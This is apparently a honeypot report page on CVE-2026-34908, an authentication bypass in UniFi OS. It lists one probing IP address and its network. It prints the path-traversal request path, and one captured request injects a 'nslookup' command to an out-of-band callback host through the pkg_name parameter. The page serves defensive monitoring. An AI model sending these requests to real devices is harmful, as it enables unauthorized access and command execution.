CVE-2026-34908: UniFi OS - Authentication Bypass via Path Traversal (..%2f)
HoneyLabs honeypots recorded 1 probes matching CVE-2026-34908 from 1 distinct source IP addresses in the last 7 days. Severity is rated critical.
This CVE is on CISA's Known Exploited Vulnerabilities list.
Request paths that identify it
- /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package
Addresses probing it
| Source IP | Probes | Network | Country |
|---|---|---|---|
| 93.123.109.214 | 1 | Techoff Srv Limited | Bulgaria |
Networks it comes from
| ASN | Organisation | Probes | Source IPs |
|---|---|---|---|
| AS48090 | Techoff Srv Limited | 1 | 1 |
Captured requests
- /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+nslookup+dat5s2dr4bohuvf6jbkgz4u5ahg7y5gmf.oast.online+%3b
CVE report
CVE report
Open a specific CVE from the CVE tracker.